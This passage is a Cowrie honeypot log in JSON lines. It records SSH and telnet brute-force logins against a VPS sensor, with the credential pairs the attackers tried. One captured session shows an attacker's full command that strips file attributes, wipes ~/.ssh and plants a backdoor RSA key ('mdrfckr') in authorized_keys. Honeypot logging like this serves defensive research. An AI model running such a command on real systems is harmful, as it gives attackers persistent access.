k-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:20:43.812739Z","src_ip":"134.199.225.42","session":"7fa4a9692d7f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T06:20:44.487765Z","src_ip":"134.199.225.42","session":"7fa4a9692d7f"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:20:45.649335Z","src_ip":"134.199.225.42","session":"7fa4a9692d7f"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":60416,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b7a03e07317","protocol":"ssh","message":"New connection: 134.199.225.42:60416 (1.2.3.4:22) [session: 5b7a03e07317]","sensor":"my-vps","timestamp":"2025-08-26T06:20:45.800393Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:20:45.801303Z","src_ip":"134.199.225.42","session":"5b7a03e07317"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:20:45.956859Z","src_ip":"134.199.225.42","session":"5b7a03e07317"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:20:46.615957Z","src_ip":"134.199.225.42","session":"5b7a03e07317"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:20:46.773735Z","src_ip":"134.199.225.42","session":"5b7a03e07317"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:20:46.775097Z","src_ip":"134.199.225.42","session":"f1e8daacfd9b"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:21:01.361537Z","src_ip":"212.227.235.229","session":"de8d49aafe0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39226,"dst_ip":"1.2.3.4","dst_port":22,"session":"3bde6e06397d","protocol":"ssh","message":"New connection: 212.227.235.229:39226 (1.2.3.4:22) [session: 3bde6e06397d]","sensor":"my-vps","timestamp":"2025-08-26T06:21:10.067065Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:21:10.671379Z","src_ip":"212.227.235.229","session":"3bde6e06397d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T06:21:10.672162Z","src_ip":"212.227.235.229","session":"3bde6e06397d"}
{"eventid":"cowrie.login.success","username":"root","password":"Kunwar@123","message":"login attempt [root/Kunwar@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:21:13.578602Z","src_ip":"212.227.235.229","session":"3bde6e06397d"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:21:14.245286Z","src_ip":"212.227.235.229","session":"3bde6e06397d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49446,"dst_ip":"1.2.3.4","dst_port":23,"session":"2535ea8d6c89","protocol":"telnet","message":"New connection: 212.227.235.229:49446 (1.2.3.4:23) [session: 2535ea8d6c89]","sensor":"my-vps","timestamp":"2025-08-26T06:21:25.509083Z"}
{"eventid":"cowrie.session.closed","duration":13.125713348388672,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:21:38.634724Z","src_ip":"212.227.235.229","session":"2535ea8d6c89"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":45774,"dst_ip":"1.2.3.4","dst_port":22,"session":"c177864b5f20","protocol":"ssh","message":"New connection: 134.199.225.42:45774 (1.2.3.4:22) [session: c177864b5f20]","sensor":"my-vps","timestamp":"2025-08-26T06:21:45.270054Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:21:45.270807Z","src_ip":"134.199.225.42","session":"c177864b5f20"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:21:45.427880Z","src_ip":"134.199.225.42","session":"c177864b5f20"}
{"eventid":"cowrie.login.failed","username":"sftptest","password":"sftptest","message":"login attempt [sftptest/sftptest] failed","sensor":"my-vps","timestamp":"2025-08-26T06:21:46.098922Z","src_ip":"134.199.225.42","session":"c177864b5f20"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:21:47.259946Z","src_ip":"134.199.225.42","session":"c177864b5f20"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":43274,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea5bc673450a","protocol":"ssh","message":"New connection: 134.199.225.42:43274 (1.2.3.4:22) [session: ea5bc673450a]","sensor":"my-vps","timestamp":"2025-08-26T06:22:47.067158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:22:47.068222Z","src_ip":"134.199.225.42","session":"ea5bc673450a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:22:47.225914Z","src_ip":"134.199.225.42","session":"ea5bc673450a"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123123123","message":"login attempt [ubuntu/123123123] failed","sensor":"my-vps","timestamp":"2025-08-26T06:22:47.897447Z","src_ip":"134.199.225.42","session":"ea5bc673450a"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:22:49.058375Z","src_ip":"134.199.225.42","session":"ea5bc673450a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36888,"dst_ip":"1.2.3.4","dst_port":23,"session":"cff45660f9e1","protocol":"telnet","message":"New connection: 212.227.125.160:36888 (1.2.3.4:23) [session: cff45660f9e1]","sensor":"my-vps","timestamp":"2025-08-26T06:23:05.492261Z"}
{"eventid":"cowrie.session.closed","duration":30.514025449752808,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:23:36.006197Z","src_ip":"212.227.125.160","session":"cff45660f9e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32990,"dst_ip":"1.2.3.4","dst_port":22,"session":"b714a6fb38c0","protocol":"ssh","message":"New connection: 212.227.235.229:32990 (1.2.3.4:22) [session: b714a6fb38c0]","sensor":"my-vps","timestamp":"2025-08-26T06:24:32.973067Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:24:32.974610Z","src_ip":"212.227.235.229","session":"b714a6fb38c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:24:33.086334Z","src_ip":"212.227.235.229","session":"b714a6fb38c0"}
{"eventid":"cowrie.login.success","username":"root","password":"Nf123456","message":"login attempt [root/Nf123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:24:33.530363Z","src_ip":"212.227.235.229","session":"b714a6fb38c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:24:33.787220Z","src_ip":"212.227.235.229","session":"b714a6fb38c0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:24:33.787891Z","src_ip":"212.227.235.229","session":"b714a6fb38c0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:24:33.789428Z","src_ip":"212.227.235.229","session":"b714a6fb38c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:24:33.888862Z","src_ip":"212.227.235.229","session":"b714a6fb38c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:24:34.119683Z","src_ip":"212.227.235.229","session":"b714a6fb38c0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T06:24:34.120366Z","src_ip":"212.227.235.229","session":"b714a6fb38c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56168,"dst_ip":"1.2.3.4","dst_port":22,"session":"dfca54fc6239","protocol":"ssh","message":"New connection: 212.227.235.229:56168 (1.2.3.4:22) [session: dfca54fc6239]","sensor":"my-vps","timestamp":"2025-08-26T06:24:34.182060Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:24:34.182892Z","src_ip":"212.227.235.229","session":"dfca54fc6239"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T06:24:34.226144Z","src_ip":"212.227.235.229","session":"b714a6fb38c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:24:34.227122Z","src_ip":"212.227.235.229","session":"b714a6fb38c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33258,"dst_ip":"1.2.3.4","dst_port":22,"session":"738e3946b3b3","protocol":"ssh","message":"New connection: 212.227.235.229:33258 (1.2.3.4:22) [session: 738e3946b3b3]","sensor":"my-vps","timestamp":"2025-08-26T06:24:34.347804Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:24:34.349495Z","src_ip":"212.227.235.229","session":"738e3946b3b3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:24:34.448851Z","src_ip":"212.227.235.229","session":"dfca54fc6239"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:24:34.460744Z","src_ip":"212.227.235.229","session":"738e3946b3b3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T06:24:34.913502Z","src_ip":"212.227.235.229","session":"738e3946b3b3"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:24:36.018588Z","src_ip":"212.227.235.229","session":"738e3946b3b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33704,"dst_ip":"1.2.3.4","dst_port":22,"session":"d66c63edb602","protocol":"ssh","message":"New connection: 212.227.235.229:33704 (1.2.3.4:22) [session: d66c63edb602]","sensor":"my-vps","timestamp":"2025-08-26T06:24:36.168110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:24:36.176308Z","src_ip":"212.227.235.229","session":"d66c63edb602"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:24:36.290053Z","src_ip":"212.227.235.229","session":"d66c63edb602"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:24:36.725287Z","src_ip":"212.227.235.229","session":"d66c63edb602"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:24:36.829985Z","src_ip":"212.227.235.229","session":"d66c63edb602"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:24:36.851621Z","src_ip":"212.227.235.229","session":"b714a6fb38c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48638,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a37ad2168cc","protocol":"ssh","message":"New connection: 212.227.235.229:48638 (1.2.3.4:22) [session: 4a37ad2168cc]","sensor":"my-vps","timestamp":"2025-08-26T06:25:03.884994Z"}
